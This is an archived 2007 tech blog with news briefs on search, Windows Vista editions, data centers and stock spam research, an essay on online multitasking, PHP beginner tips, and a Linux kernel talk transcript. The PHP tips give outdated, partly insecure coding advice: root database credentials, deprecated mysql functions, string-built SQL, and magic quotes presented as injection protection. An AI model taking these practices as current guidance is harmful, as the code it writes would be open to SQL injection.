
Monday, January 29, 2007

Sing and Search the Internet

Search engines are becoming more and more powerful, allowing you to search for all kinds of information, including jobs, blog posts, videos, news and even products to buy. At this time, Google is the best-known search engine on the internet, continuously challenged by Yahoo, Ask and Live Search. From time to time, other companies try to design innovative services meant to compete with those provided by the giant firms.

Midomi is one of the more interesting of these services: it was built around a new search technology that is currently unavailable on the best-known search engines.

“midomi is the ultimate music search tool because it is powered by your voice. Sing, hum, or whistle to instantly find your favorite music and connect with a community that shares your musical interests. Give it a try. It's truly amazing! Our mission is to build the most comprehensive database of searchable music. You can contribute to the database by singing in midomi's online recording studio in any language or genre. The next time anyone searches for a song, your performance might be the top result,” reads the description of the search technology.

The idea behind Midomi is simple: all you need to do is go to the official website of the service, click the Start Voice Search button and sing your song. The service records your voice, looks for songs that match your query and returns the results. Midomi is not only a search technology; it also represents a large community of users who continuously post new recordings of songs from all around the world, giving you the possibility to search against predefined or prerecorded sounds.

If you want to test this exciting search engine, visit the Midomi website and try to avoid blaming your singing talent if the service doesn't return any relevant results.

Saturday, January 27, 2007

Windows Vista Home Basic, Home Premium, Business, Enterprise and Ultimate – Comparison

With Windows Vista just two days away, I thought I would provide you with a detailed comparison of the various editions of Windows Vista. And as the saying goes, one picture is worth a thousand words: the images at the bottom illustrate all the features of the operating system according to edition.

But of course, you will also be able to judge the differences in your own home. Buy a Windows Vista DVD with a license for Home Basic. Although the license is just for Home Basic, you will be able to install and test all the editions of the operating system, with the exception of Enterprise, which is available only via volume licensing.

However, the single Vista DVD will permit you to install Home Basic, Home Premium, Business and Ultimate and to test drive each edition for free for 30 days. How? Well... during the installation process you will be asked to enter a license key. The license key defines the edition of Windows Vista that will be deployed. However, you can choose not to enter any license key, install whichever edition you prefer and test it. As I've said above, the operating system delivers a 30-day initial grace period with full functionality. You will then be able to upgrade to Home Premium, Business or Ultimate via Windows Vista Anytime Upgrade.

This method will keep you from spending $399 on Windows Vista Ultimate when the $239 Vista Home Premium is more than enough for your needs.

[Images: Windows Vista edition-by-edition feature comparison]

IBM to Open Source Novel Identity Protection Software

coondoggie handed us a link to a Network World article reporting that IBM plans to open source the project 'Identity Mixer'. Developed by a Zurich-based research lab for the company, Identity Mixer is a novel approach to protecting user identities online. The project, which is a piece of XML-based software, uses a type of digital certificate to control who has access to identity information in a web browser. IBM is enthusiastic about widespread adoption of this technology, and so plans to open source the project through the Eclipse Open Source Foundation. The company hopes this tactic will see the software's use in commercial, medical, and governmental settings.

Thursday, January 25, 2007

Google Web Search Now Integrates Blog Results

Type a phrase into Google.com, add the word "blog" at the end of your query, and you will get not only web results but also more up-to-date gems from Google Blog Search. That's the word from the Google Operating System weblog. This has been running as a test since November.

Capstone Mobile Selects GE864-Quad for Fleet Tracking Application

Telit Wireless Solutions, Inc., the US-based m2m mobile technology arm of Telit Communications, today announced that Capstone Mobile has signed a supply agreement with Telit. Telit’s module will be used in Capstone Mobile’s fleet tracking devices to enable mobile monitoring and tracking of high value assets.

Capstone Mobile has developed a system that allows customers to manage their vehicle fleets and view tracking information on portable devices such as laptops and PDAs. Beyond location tracking, the application monitors fleets for critical factors such as temperature and humidity changes and breaches in containers and, based on variances, recommends environmental adjustments.

“Telit’s modules possess the ability to be both backwards compatible and easily programmable,” said Scott Williamson, Vice President of Capstone Mobile. “Telit is at the top of a launching industry. The need for critical data has never been greater, and Telit has provided the ideal solution for our needs.”

Thanks to its small external dimensions of 30 x 30 x 2.8 mm and light weight of only seven grams, the GE864 is especially well suited to applications requiring sub-compact form factors. With the GE864, Telit is the world's first and only module manufacturer to offer a GSM/GPRS module with a ball grid array (BGA) installation concept.

BGA is based on tiny solder balls placed on the underside of a module, allowing for direct mounting to the application circuit board without the need for plugs, cables, or connectors. The module can be assembled using automated pick-and-place equipment for standard SMD components. This reduces not only material costs, but also installation time and assembly costs. The board-to-board BGA mounting is extremely stable and reliable. Together, the compact shape and reduced assembly costs are crucial advantages for use in cost-sensitive applications, such as those for the fleet management and consumer markets. The GE864 is the market’s only module viable for very large scale production in these categories.

“Capstone Mobile has a proven, well thought out approach to the application of wireless technology, and we welcome them as the first U.S.-based customer for Telit Wireless Solutions,” said Roger Dewey, President and CEO of Telit Wireless Solutions, Inc. “Their applications are at the cutting edge of the wireless revolution, and together we will ensure they stay there.”

Telit’s approach to m2m is unique—their products are divided into families, each addressing the demands of various vertical market application groups according to size, production scale, etc. Within these families, products have the same form factor and functionality irrespective of their wireless technology (GSM, CDMA). The advantage for customers is immediately apparent because all modules within a family are interchangeable, due to uniformity in size, shape, connectors and software interface. Customers can easily replace any module with its successor because there is little or no change required to the application.

There are at least ten times more machines, equipment, vehicles and robots than there are humans in the world, creating a critical need to transfer information efficiently between machines or from machines to humans. The relatively new m2m industry delivers increased efficiency, time savings, improved customer orientation and greater flexibility.

BBC To Host Multi-OS Debate

"BBC is currently seeking submissions from all you Microsoft Windows, Mac and Linux devotees "in 100 words or less, why you are such a supporter of your chosen operating system and what features you love about it". They will then select one user of each platform to go head to head in a debate that will be part of the BBC's Microsoft Vista launch coverage on January 30th."

Street Fighting Robot Challenge

"There's no better way to assure the eventual destruction of mankind then by the event sponsored by Singapore's Defence Science and Technology Agency. Newscientist has a good writeup of the robot challenge, which is to build a robot that can operate autonomously in urban warfare conditions, moving in and out of buildings to search and destroy targets like a human soldier."

Tuesday, January 23, 2007

Internet Multitasking Disorder -- And How We Read the News

 


On any given day, Lindsay, a 24-year-old office worker in New York, can be found with several windows open in her Web browser. When she is not sending e-mails or browsing MySpace, she is chatting with her friends or co-workers through AIM – sometimes with multiple conversations going at once.


The New York Times is her homepage, giving her the latest news every morning, and she recently downloaded Firefox, where she checks RSS feeds for the latest headlines.

This is how Lindsay stays connected to the world. But at times the overflow of information can cause distractions. In an age of instant communication, people are accustomed to getting news from multiple sources quickly and constantly, but with so many sources of information on her plate, it's easy for Lindsay to just click away – another case of Internet Multitasking Syndrome.

"I think for the most part I'm accustomed to reading the news online as opposed to hardcopy and people like me are the type of person that will be persuaded to click somewhere else," said Lindsay.


Although Internet Multitasking Syndrome is not a known medical disorder (I just made it up five minutes ago), it is not uncommon for people to become so immersed in their online activities that their cognitive abilities wane. After hours staring at a screen, flipping between web pages and information outlets, people can develop feelings of anxiety and stress and a decrease in mental performance, said John Suler, author of The Psychology of Cyberspace. "There are limits to how much information one person can process," he continued.

These are symptoms akin to sensory overload, and while it is rare for a person to become so addicted to the Internet that it damages their relationships with friends and family or their performance at work, Suler said that the juggling act we perform online can affect the way we read the news. "You are getting a cursory understanding of several different sources of information at one time, it's a delicate balance – do you want to get a shallow understanding of lots of different things or a deep grasp of one topic," asked Suler.

Online, most people opt for the quick glance. The average Internet attention span is roughly 10 seconds according to some statistics, allowing humans to just barely beat out goldfish in terms of staying on topic. One major cause of this decrease in attention is hyperlinks, which are built into Web pages and allow people to jump from one digital location to the next.

Blue highlighted words inserted in our text have become commonplace on the Internet, but no one has made an attempt to study what effect they have on our digital culture, said Joseph Turow, a professor at Penn's Annenberg School for Communications.

"We haven't really taken the time to ask what it means when we have an approach to the world where we think of connections in this way. What are the hidden assumptions that places like Google, Yahoo and MSM create for you, to see the world one way or another," said Turow.

Knowing that readers have such a short attention span and that they can click away at any moment, journalists have to approach writing for the Web in a different manner.

"When you write for the Web… you don't beat around the bush, you get to the point quickly, because you don't have the luxury of putting the reader in the mood or creating the intellectual framework for your argument," said Jack Shafer, author of Press Box a column at Slate Magazine.

But writing for the Web doesn't just mimic the wire stories of old. While the speed at which information comes across is similar, the nature of the information is somewhat different. Shafer uses links only as a referencing tool -- a way to cite primary sources that back his arguments -- but bloggers and even journalists often use them as a means to highlight conversations that share their political sentiments.

In these circles people are called "ditto-heads": groups of writers and readers who only link to and read views that echo their own beliefs. While this might make for a "good" read – and can even capture a reader's attention – it fails to address one of journalism's main components: creating a healthy civic discussion.

It leads one to wonder whether the Internet is a good place to get the news at all. But many journalists see great potential for online news to inform readers about important issues in their lives. Saul Hansell, a writer for the New York Times, said that newspapers have always known people don't read to the end of a story. With news online this becomes apparent, but at least it provides a breadth of material that is easy to access.

Readers always have something in their peripheral vision, and while the Internet allows them to investigate these issues on a shallow level, it also gives them the tools to focus intimately on other matters, said Hansell. "I would take any of these problems over having too little information or information that is too hard to get at."

Lindsay prefers to get her news online. But as she sifts between news feeds, social networking sites, gossip blogs and chats, the lines between reading the news and just plain reading are blurred and one has to wonder if the news suffers.



Monday, January 22, 2007

10 Tips That Every PHP Newbie Should Know

I wish I had known these 10 tips the day I started working with PHP. Instead of learning them through a painstaking process, I could have been on my way to becoming a PHP programmer even sooner! This article is presented in two parts and is intended for folks who are new to PHP.
Tip 1: MySQL Connection Class
The majority of web applications I've worked with over the past year have used some variation of this connection class:

class DB {
    var $host, $db, $user, $pass, $link;

    function DB() {
        $this->host = "localhost";  // your host
        $this->db   = "myDatabase"; // your database
        $this->user = "root";       // your username
        $this->pass = "mysql";      // your password

        // open the connection and select the database
        $this->link = mysql_connect($this->host, $this->user, $this->pass);
        mysql_select_db($this->db, $this->link);
    }
}

// calls it to action
$db = new DB();

Simply edit the variables and include this in your files. It doesn't require any special understanding to use. Once you've added it to your repertoire, you won't likely need to create a new connection class any time soon. Now you can get to work and quickly connect to your database without a lot of extra code:

$result = mysql_query("SELECT * FROM table ORDER BY id ASC LIMIT 0,10");

More information can be found in the manual--be sure you read the comments: http://www.php.net/mysql_connect/
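A brief usage sketch (my own illustration, not from the original article), assuming the class above is saved as db.php along with the "$db = new DB();" line:

// Hypothetical usage: pull in the connection class, then query away
require_once 'db.php'; // assumed filename; adjust to your project

$result = mysql_query("SELECT * FROM table ORDER BY id ASC LIMIT 0,10");
while ($row = mysql_fetch_assoc($result)) {
    echo $row['id'] . "\n"; // print one column from each row
}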
Tip 2: Dealing with Magic Quotes
PHP "automagically" can apply slashes to your $_POST data for security purposes. It's an important measure to prevent SQL injections. However, slashes in your scripts can wreak havoc. This is an easy method for dealing with them. The way to handle the slashes is to strip them from our variables. However, what if the magic quotes directive is not enabled?

function magicQuotes($post) {

    if (get_magic_quotes_gpc()) {
        if (is_array($post)) {
            // strip the automatically added slashes from every element
            return array_map('stripslashes', $post);
        } else {
            return stripslashes($post);
        }
    } else {
        return $post; // magic quotes are not on, so return the data untouched
    }

}

The function above checks whether magic quotes is enabled. If it is, it determines whether your $_POST data is an array (which it likely is) and strips the slashes accordingly; otherwise it returns the data untouched.
Understand that this is not true 'validation'. Be sure to validate all your user-submitted data, most commonly with regular expressions.
More information about magic quotes: http://www.php.net/magic_quotes/
More information about SQL injection: http://www.php.net/manual/en/security.database.sql-injection.php
More information about regular expressions: http://www.php.net/pcre/
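A quick usage sketch (mine, not from the original tip; the field name is invented):

// Hypothetical usage: normalize the raw form data before anything else
$post = magicQuotes($_POST);
echo $post['comment']; // slashes are stripped only if magic quotes added them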
Tip 3: Safely Query Database with mysql_real_escape_string
When you are ready to query your database, you will need to escape special characters (quotes, for instance) by adding slashes, for safety's sake. We apply this to our variables just before inserting them into the database. Once again, we first need to determine which version of PHP is running:

function escapeString($post) {

    // mysql_real_escape_string() was added in PHP 4.3.0;
    // fall back to the older mysql_escape_string() before that
    if (version_compare(phpversion(), '4.3.0', '>=')) {
        return array_map('mysql_real_escape_string', $post);
    } else {
        return array_map('mysql_escape_string', $post);
    }

}

More information about mysql_real_escape_string: http://www.php.net/mysql_real_escape_string/
More information about SQL injection: http://php.belnet.be/manual/en/security.database.sql-injection.php
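As a usage sketch (my illustration; the table and field names are invented), escape the whole array once, just before building the query. Note that mysql_real_escape_string() needs an open connection, so connect first:

// Hypothetical usage: escape every POST field, then build the statement
$post = escapeString($_POST);
mysql_query("INSERT INTO users (name, email)
             VALUES ('" . $post['name'] . "', '" . $post['email'] . "')");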
Tip 4: Debugging
If you search the forum, you'll find many good threads with rules about debugging. The single most important thing you can do is ask PHP to report errors and notices to you by adding this line at the beginning of your scripts:

error_reporting(E_ALL);

This will keep you in line as you learn by printing out errors to your screen. The most common error that E_ALL reports is not actually an error, but a notice for an "Undefined index". Typically, it means that you have not properly set your variable. It's easy to fix and keeps you programming correctly.
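One caveat worth adding (my note, not part of the original tip): error_reporting() only controls which errors are raised; if the display_errors setting is off, nothing is printed to the screen. A minimal development-only header:

// Development settings (assumption: never leave display_errors on in production)
error_reporting(E_ALL);       // report all errors and notices
ini_set('display_errors', 1); // actually print them to the screen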
Another convenient tool while working with queries is print_r(). If your query is returning null or strange results, simply place this after you've fetched your rows into $result and it will display the array's full contents:

print_r($result); exit;

The exit command stops your script from executing any further so you can specifically review your query results.
More information about error_reporting: http://www.php.net/error_reporting/
More information about print_r: http://www.php.net/print_r/
Tip 5: Writing Functions (and Classes)
Initially I thought that tackling functions and classes would be difficult--thankfully I was wrong. Writing a function is something I urge all newbies to start doing immediately--it's really that simple. You are instantly involved in understanding how to produce more efficient code in smaller pieces. Where you might have a block of code that reads like this:

if ($rs['prefix'] == 1) {
$prfx = 'Mrs. ';
} elseif ($rs['prefix'] == 2) {
$prfx = 'Ms. ';
} else {
$prfx = 'Mr. ';
}

echo $prfx.$rs['name'].' '.$rs['last_name'];

You could rewrite it like this in a function:

function makePrefix($prefix = '')
{
    if (!$prefix) return '';
    if ($prefix == 1) return 'Mrs. ';
    if ($prefix == 2) return 'Ms. ';
    if ($prefix == 3) return 'Mr. ';
    return ''; // unknown codes get no prefix
}

echo makePrefix($rs['prefix']) . $rs['name'] . ' ' . $rs['last_name'];

Now that you've written this function, you can use it in many different projects!
An easy way to describe a class is to think of it as a collection of functions that work together. Writing a good class requires an understanding of PHP 5's new OOP structure, but by writing functions you are well on your way to some of the greater powers of PHP.
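To make that concrete, here is a toy class (a sketch of my own; the names and sample data are invented) that simply groups the prefix helper with a related formatting function:

// Toy example: a class as a collection of functions that work together
class NameFormatter {
    function makePrefix($prefix = '') {
        if ($prefix == 1) return 'Mrs. ';
        if ($prefix == 2) return 'Ms. ';
        if ($prefix == 3) return 'Mr. ';
        return '';
    }

    function fullName($row) {
        // reuse makePrefix() from within the same class via $this
        return $this->makePrefix($row['prefix']) . $row['name'] . ' ' . $row['last_name'];
    }
}

$fmt = new NameFormatter();
$row = array('prefix' => 2, 'name' => 'Jane', 'last_name' => 'Doe'); // sample data
echo $fmt->fullName($row); // prints "Ms. Jane Doe"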
More information about writing functions: http://www.php.net/manual/en/language.functions.php
More information about writing classes: http://www.php.net/manual/en/language.oop5.php
Everything I've learned, more or less, came from the manual, trial and error, and great help from the many fine people here at PHPBuilder. Good luck programming--and come back soon for Part 2 in this series!

The Anatomy of Pump N' Dump Stock Spamming

"Laura Frieder and Jonathan Zittrain have analyzed pump n' dump spam activity in their paper 'Spam Works: Evidence from Stock Touts and Corresponding Market Activity'. Unbelievably, it appears that spammers are able to achieve a 5% gain on pumped stock before dumping it, along with a dramatic increase in transaction volume of the stock. From the synopsis: ' We suggest that the effectiveness of spammed stock touting calls into question prevailing models of securities regulation that rely principally on the proper labeling of information and disclosure of conflicts of interest to protect consumers, and we propose several regulatory and industry interventions. Based on a large sample of touted stocks listed on the Pink Sheets quotation system, we find that stocks experience a significantly positive return on days prior to heavy touting via spam. Volume of trading responds positively and significantly to heavy touting.'"

Google, Microsoft Escalate Data Center Battle

"The race by Microsoft and Google to build next-generation data centers is intensifying. On Thursday Microsoft announced a $550 million San Antonio project, only to have Google confirm plans for a $600 million site in North Carolina. It appears Google may just be getting started, as it is apparently planning two more enormous data centers in South Carolina, which may cost another $950 million. These 'Death Star' data centers are emerging as a key assets in the competitive struggle between Microsoft and Google, which have both scaled up their spending (as previously discussed on Slashdot). Some pundits, like PBS' Robert X. Cringley, say the scope and cost of these projects reflect the immense scale of Google's ambitions."

Myths, Lies, and Truths about the Linux kernel

slide 00
Hi, as Dave said, I'm Greg, and I've been given the time by the people at OLS to talk to you for a bit about kernel stuff. I'm going to discuss a number of different lies that people always say about the kernel and try to debunk them; go over a few truths that aren't commonly known; and discuss some myths that I hear repeated a lot.

Now when I say a myth, I'm referring to something that is believed to have some truth to it, but when you really examine it, it turns out to be fictional. Let's call them the "urban myths" of the Linux kernel.

So, to start, let's look at a very common myth that really annoys me a lot:

slide 01
Now I know that almost everyone involved in Linux has heard something like this in the past: about how Linux lacks device support, or really needs to support more hardware, or how we are lagging in the whole area of drivers. I've seen almost this same kind of quote from someone at OSDL a few months back, in my local paper, and it's extremely annoying.

This is really a myth, and people should really know better than to say this these days. So, who said this specific quote?

slide 02
Ick.

Ok, well, he probably said this a long time ago, back when Linux really didn't support many different things, and when "Plug & Play" was a big deal with ISA buses and stuff:

slide 03
Ugh.

Ok, so maybe I need to spend some time and really debunk this myth as it really isn't true anymore.

So, what is the truth concerning Linux and devices these days? It's this:

slide 04
Yes, that's right, we support more things than anyone else. And more than anyone else ever has in the past. Linux has a very long list of things that we have supported before anyone else ever did. That includes such things as:

  • USB 2.0

  • Bluetooth

  • PCI Hotplug

  • CPU Hotplug

  • memory Hotplug (ok, some of the older Unixes did support CPU and memory hotplug in the past, but no desktop OS still supports this.)

  • wireless USB

  • ExpressCard


And the list goes on; the embedded arena is especially full of drivers that no one else supports.

But there's a real big part of the whole hardware support issue that goes beyond just specific drivers, and that's this:

slide 05
Yes, we passed the NetBSD people a few years ago in the number of different processor families and types that we support now. No other "major" operating system even comes remotely close in platform support for what we have in Linux. Linux now runs on everything from a cellphone, to a radio-controlled helicopter, to your desktop, to a server on the internet, on up to a huge 73% of the TOP500 largest supercomputers in the world.

And remember, almost every driver that we support runs on every one of those different platforms. This is something that no one else has ever done in the history of computing. It's just amazing how flexible and how powerful Linux is this way.

We now have the most scalable and most supported operating system that has ever been created. We have achieved something so unique, different and flexible that the "Linux doesn't support hardware" myth is something everyone needs to stop repeating, as it simply isn't true anymore.

Now, to be fair to Jeff Jaffe, when he said that original quote, he had just become the CTO of Novell, and didn't really have much recent experience with Linux, and did not realize the real state of device support that the modern distros now provide.

Look at the latest versions of Fedora, SuSE, Ubuntu and others. Installation is a complete breeze (way easier than any other operating system installation). You can now plug a new device in and the correct driver is automatically loaded, no need to hunt for a driver disk somewhere, and you are up and running with no need to even reboot.

As an example of this, I recently plugged a new USB printer into my laptop, and a dialog box popped up and asked me if I wanted to print a test page on it. That's it, nothing else. If that isn't "plug and play", I really don't know what is.

But not everyone has been ignoring the success of Linux, as is obvious from the size of this conference. Lots of people see Linux and want to use it for their needs, but when they start looking deeper into the kernel and how it is developed, almost the first thing they run into is the total lack of a plan:

slide 06
This drives lots of people absolutely crazy all the time. You see questions like "Linux has no roadmap, so how can I create a product with it?", and "How does anyone get anything done since no one is directing anyone?", and other things like this.

Well, obviously based on the fact that we are successful at doing something that's never been done before, we must have got here somehow, and be doing something right, but what is it?

Traditionally, software is created by determining the requirements for it, writing up a big specification document, reviewing it and getting everyone to agree on it, implementing the spec, testing it, and so on. In college they teach software engineering methodologies like the waterfall method, the iterative process method, formal proof methods, and others. Then there are the newer ways of creating programs, like extreme programming and top-down design, and so on.

So, what do we do here in the kernel?

slide 07
Dr. Baba studies how businesses work and came to this conclusion after researching how the open source community works and specifically how the Linux kernel is developed and managed.

I guess it makes sense that, since we have now created something that has never been done before, we did it by doing something different from what anyone else does. So, what is it? How is the kernel designed and created? Linus answered this question last year when, asked to explain the kernel design process to a group of companies, he said the following:

slide 08
This is a really important point that a lot of people don't seem to understand. Actually, I think they understand it, they just really don't like it.

The kernel is not developed with big design documents, feature requests and so on. It evolves over time based on the need at the moment for it. When it first started out, it only supported one type of processor, as that's all it needed to. Later, a second architecture was added, and then more and more as time went on. And each time we added a new architecture, the developers figured out only what was needed to support that specific architecture, and did the work for that. They didn't do the work in the very beginning to allow for the incredible flexibility of different processor types that we have now, as they didn't know what was going to be needed.

The kernel only changes when it needs to, in ways that it needs to change. It has been scaled down to tiny little processors when that need came about, and was scaled way up when other people wanted to do that. And every time that happened, the code was merged back into the tree to let everyone else benefit from the changes, as that's the license that the kernel is released under.

Jonathan on the first day of the conference showed you the huge rate of change that the kernel is under. Tons of new features are added at a gigantic rate, along with bug fixes and other things like cleanups. This shows how fast the kernel is still evolving, almost 15 years after it was created. It's morphed into this thing that is very adaptable and looks almost nothing like what it was even a few years ago. And that's the big reason why Linux is so successful, and why it will keep being successful. It's because we embrace change, and love it, and welcome it.

But one "problem" for a lot of people is that due to this constantly evolving state, the Linux kernel doesn't provide some things that "traditional" operating systems do. Things like an in-kernel stable API. Everyone has heard this one before:

slide 09
For those of you who don't know what an API is, it is the description of how the kernel talks within itself to get things done. It describes things like what the specific functions are that are needed to do a specific task, and how those functions are called.

For Linux, we don't have a stable internal api, and for people to wish that we would have one is just foolish. Almost two years ago, the kernel developers sat down and wrote why Linux doesn't have an in-kernel stable API and published it within the kernel in the file:

slide 10
If you have any questions please go read this file. It explains why Linux doesn't have a stable in-kernel api, and why it never will. It all goes back to the evolution thing. If we were to freeze how the kernel works internally, we would not be able to evolve in ways that we need to do so.

Here's an example that shows how this all works. The Linux USB code has been rewritten at least three times. We've done this over time in order to handle things that we didn't originally need to handle, like high speed devices, because we learned the problems of our first design, and to fix bugs and security issues. Each time we made changes to our API, we updated all of the kernel drivers that used it, so nothing would break. And we deleted the old functions, as they were no longer needed and did things the wrong way. Because of this, Linux now has the fastest USB bus speeds when you test all of the different operating systems. We max out the hardware as fast as it can go, and you can do this from simple userspace programs; no fancy kernel driver work is needed.

Now Windows has also rewritten their USB stack at least 3 times; with Vista, it might be 4 times, I haven't taken a look at it yet. But each time they did a rework, and added new functions and fixed up older ones, they had to keep the old API functions around, as they have taken the stance that they cannot break backward compatibility due to their stable API viewpoint. They also don't have access to the code in all of the different drivers, so they can't fix them up. So now the Windows core has all 3 sets of API functions in it, as they can't delete things. That means they maintain the old functions, have to keep them in memory all the time, and it takes up engineering time to handle all of this extra complexity. That's their business decision, and that's fine, but with Linux we didn't make that decision, and it helps us remain a lot smaller, more stable, and more secure.

And by secure, I really mean it. A lot of times a security problem will be found in one driver, or in one core part of the kernel, and the kernel developers fix it, and then go and fix it up in all other drivers that have the same problem. Then, when the fix is released, all users of all drivers are secure. When other operating systems don't have all of the drivers in their tree and they fix a security problem, it's up to the individual companies to update their drivers and fix the problem too. And that rarely happens. So people buy the device and then use the older driver that comes in the box with it, which is insecure. This has happened a lot recently, and it really shows how having a stable API can actually hurt end users, when the original goal was to help developers.

When I talk to people about the instability of the kernel API and how kernel development works, they usually respond with:

slide 11
This just is not true at all. We have a whole sub-architecture that only has 2 users in the world. We have drivers that I know have only one user, as there was only one piece of hardware ever made for them. It just isn't true; we will take drivers for anything into our tree, as we really want them.

We want more drivers, no matter how "obscure", because it allows us to see patterns in the code, and realize how we could do things better. If we see a few drivers doing the same thing, we usually take that common code and move it into a shared piece of code, making the individual drivers smaller, and usually fixing things up nicer. We have also merged entire drivers together because they do almost the same thing. An example of this is a USB data acquisition driver that we have in the kernel. There are loads of different USB data acquisition devices out in the world, and one German company sent me a driver a while ago to support their devices. It turned out that I was working on a separate driver for a different company that did much the same thing. So, we worked together and merged the two, and we now have a smaller kernel. That one driver turned out to work for a few other companies' devices too, so they simply had to add their device IDs to the driver and never had to write any new code to get full Linux support. The original German company is happy, as their devices are fully supported, which is what their customers wanted, and all of the other companies are very happy, as they really didn't have to do any extra work at all. Everyone wins.

The second thing that people ask me about when it comes to getting code into the kernel is, well, we want to keep our code private, because it is proprietary.

So, here's the simple answer to this issue:

slide 12
That's it; it is very simple. I've had the misfortune of talking to a lot of different IP lawyers over the years about this topic, and every one that I've talked to agrees that there is no way anyone can create a Linux kernel module, today, that can be closed source. It just violates the GPL due to fun things like derivative works and linking and other stuff. Again, it's very simple.

Now no lawyer will ever come out in public and say this, as lawyers really aren't allowed to make public statements like this at all. But if you hire one and talk to them in a client/lawyer setting, they will advise you of this issue.

I'm not a lawyer, nor do I want to be one, so don't ask me anything else about this, please. If you have legal questions about license issues, talk to a lawyer, never bring it up on a public mailing list like linux-kernel, which only has programmers. To ask programmers to give legal rulings, in public, is the same as asking us for medical advice. It doesn't make sense at all.

But what would happen if one day the Linux kernel developers suddenly decided to let closed source modules into the kernel? How would that affect how the kernel works and evolves over time?

It turns out that Arjan van de Ven has written up a great thought exercise detailing exactly what would happen if this came true:

slide 13
In his article, which can be found in the linux-kernel archives really easily, he described how only the big distros, Novell and Red Hat, would be able to support any new hardware that came out, but would slowly stagnate as they would not be allowed to change anything that might break the different closed source drivers. And then, if you loaded more than one closed source module, support for your system would pretty much be impossible. Even today, this is easily seen if you try to load more than one closed source module into your system, if anything goes wrong, no company will be willing to support your problem.

The article goes on to show how the community based distros, like Gentoo and Debian, would slowly become obsolete and not work on any new hardware platforms, and dry up as no users would be able to use them anymore. And eventually, in just a few short years, the whole kernel project itself would come to a standstill, unable to innovate or change anything.

It's a really chilling tale, and quite good, please go look it up if you are interested in this topic.

But there's one more aspect of the whole closed source module issue that I really want to bring up, and one that most people ignore. It's this:

slide 14
Remember, no one forces anyone to use Linux. If you don't want to create a Linux kernel module, you don't have to. But if your customers are demanding it, and you decide to do it, you have to play by the rules of the kernel. It's that simple.

And the rule of the kernel is the GPL, it's a simple license, with standard copyright ownership issues, and many lawyers understand it.

When a company says it needs to "protect its intellectual property," that's fine; neither I nor any other kernel developer has any objection to that. But by the same token, you need to respect the kernel developers' intellectual property rights. We released our code under the GPL, which states in very specific form exactly what your rights are when using this code. When you link other code into our body of code, you are obligated by the license of the kernel to also release your code under the same license (when you distribute it).

When you take the Linux kernel code and link against it or build with its header files, and do not abide by the well-documented license of our code, you are saying that for some reason your code is much more important than the entire rest of the kernel. In short, you are giving the finger to every kernel developer who has ever released their code.

So remember, the individual companies are not more important than the kernel, for without the kernel development community, the companies would have no kernel to use at all. Andrew Morton stood up here two years ago and called companies who create closed source modules leeches. I completely agree. What they do is just totally unethical. Some companies try to skirt the license by changing how they redistribute their closed source code, forcing the end user to do the building and linking, which then causes the user to violate the GPL if they want to give that prebuilt module to anyone else. These companies are just plain unethical and wrong.

Luckily people are really starting to realize this and the big distros are not accepting this anymore. Here's what Novell publicly stated earlier this year:

slide 15
This means that SuSE 10.1, and SLES and SLED 10 will not have any closed source kernel modules in it at all. This is a very good thing.

Red Hat also includes some text like this in their kernel package, but hasn't made such a public statement.

Alright, enough depressing stuff. After companies realize that they really need to get their code into the kernel tree, they quickly run into one big problem:

slide 16
This really isn't as tough a problem as it first looks. Remember, the rate of change is about 6,000 different patches per kernel release, so someone is getting their code into the tree.

So, how to do it. Luckily, the kernel developers have written down everything that you need to know for how to do kernel development. It's all in one file:

slide 17
Please point this file out to anyone who has questions about how to do kernel development. It answers just about everything that anyone has ever asked, and points people at other places where the answers can be found.

It talks about how the kernel is developed, how to create a patch, how to find your way around the kernel tree, who to send patches to, what the different kernel trees are all about, and it even lists things you should never say on the linux-kernel mailing list if you expect people to take your code seriously.

It's a great file, and if you ever have anything that it doesn't help you out with, please let the author of that file know and they will work to add it. It should be the thing that you give to any manager or developer if they want to learn more about how to get their code into the kernel tree.

One thing that the HOWTO file describes is the various communities that can help people out with kernel development. If you are new to kernel development, there is the:

slide 18
project. This is a very good wiki, a very nice and tame mailing list where you can ask basic questions without feeling bad, and there's also an IRC channel where you can ask questions in realtime to a lot of different kernel developers. If you are just starting out, please go here, it's a very good place to learn.

If you really want to start out doing kernel development, but don't know what to do, the:

slide 19
project is an excellent place to start. They keep a long list of different "janitorial" tasks that the kernel developers have said it would be good to have done to the code base. You can pick from them, and learn the basics of how to create a patch, how to fix your email client to send a proper patch, and then, you get to see your name in the kernel changelog when your patches go in.

I really recommend this project for anyone who wants to start kernel development, but hasn't found anything specific to work on yet. It gets you to search around the kernel tree, fixing up odd things, and by doing that, you will usually find something that interests you that no one else is doing, and you can slowly start to take that portion of the kernel over. I can't recommend this group enough.

And then, there's the big huge mailing list, where everyone lives on:

slide 20
This list gets about 200 emails a day, and it can be hugely daunting for anyone trying to read it. Here's a hint: almost no one, except Andrew Morton, reads all of the emails on it. The rest of us just use filters and read the things that interest us. I really suggest finding some developers that you know provide interesting commentary and reading the threads they respond to. Or just search for subjects that look interesting. But don't try to read everything; you'll just never get any other work done if you do that.

The Linux kernel mailing list also has another kind of perceived problem. Lots of people find the reactions of developers on this list very "harsh" at times. They post their code and get back scathing reviews of everything they did wrong. Usually the reviewers only criticize the code itself, but for most people this can be a very hard thing to be on the receiving end of. They just put out what they felt was a perfect thing, only to see it cut into a zillion tiny pieces.

The big problem with this is that we really have only a very small group of people reviewing code in the kernel community. Reviewing code is a hard, unrewarding, tough thing to do. It really makes you grumpy and rude in a very short period of time. I tried it out for a whole week, and at the end of it, I was writing emails like this one:

slide 21
Other people who review code aren't even as nice as I was here.

I'd like to publicly thank Christoph Hellwig and Randy Dunlap. Both of them spend a lot of time reviewing code on the linux-kernel mailing list, and Christoph especially has a very bad reputation for it. Bad in that people don't like his reviews. But the other kernel developers really do, because he is right. If he tells you something is wrong, and you need to fix it, do it. Don't ignore advice, because everyone else is watching to see if you really do fix up your code as asked to. We need more Christophs in the kernel community.

If everyone could take a few hours a week and review the different patches sent to the mailing list, it would be a great thing. Even if you don't feel like you are a very good developer, read other people's code and ask questions about it. If they can't defend their design and code, then there's something really wrong.

It's also a great way to learn more about programming and the kernel. When you are learning to play an instrument, you don't start out writing full symphonies on your own; you spend years reading other people's scores, learning how things are put together and work and interact. Only later do you start writing your own music, small tunes, and then, if you want, working up to bigger pieces. The same goes for programming. You can learn a lot from reading and understanding other people's code. Study the things posted, ask why things are done specific ways, and point out problems that you have noticed. It's a task that the kernel really needs help with right now.

(possible side story about the quote)

Alright, but what if you want to help out with the kernel, but you aren't a programmer. What can you do? Last year Dave Jones told everyone that the kernel was going to pieces, with loads of bugs being found and no end in sight. A number of people made the response:

slide 22
